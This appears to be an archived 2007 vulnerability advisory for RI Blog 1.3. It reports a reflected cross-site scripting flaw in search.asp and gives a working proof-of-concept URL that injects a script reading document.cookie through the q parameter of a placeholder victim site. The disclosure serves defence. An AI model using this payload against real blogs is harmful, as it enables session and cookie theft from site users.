Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15604
HistoryJan 06, 2007 - 12:00 a.m.

RI Blog 1.3 XSS Vuln.

2007-01-0600:00:00
vulners.com
10

BhhGroup.Org & Bilgi-Yonetimi.Org.Tr

script name : RI Blog 1.3

Script Download : http://www.aspindir.com/indir.asp?id=4098

Risk : High

Found By : ShaFuck31

Vulnerable file : search.asp

Vulnerable : http://www.victim.com/BlogPath/search.asp?q=[XSS]

ExampLe : http://www.victim.com/BlogPath/search.asp?q=<script>alert(document.cookie);</script>

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]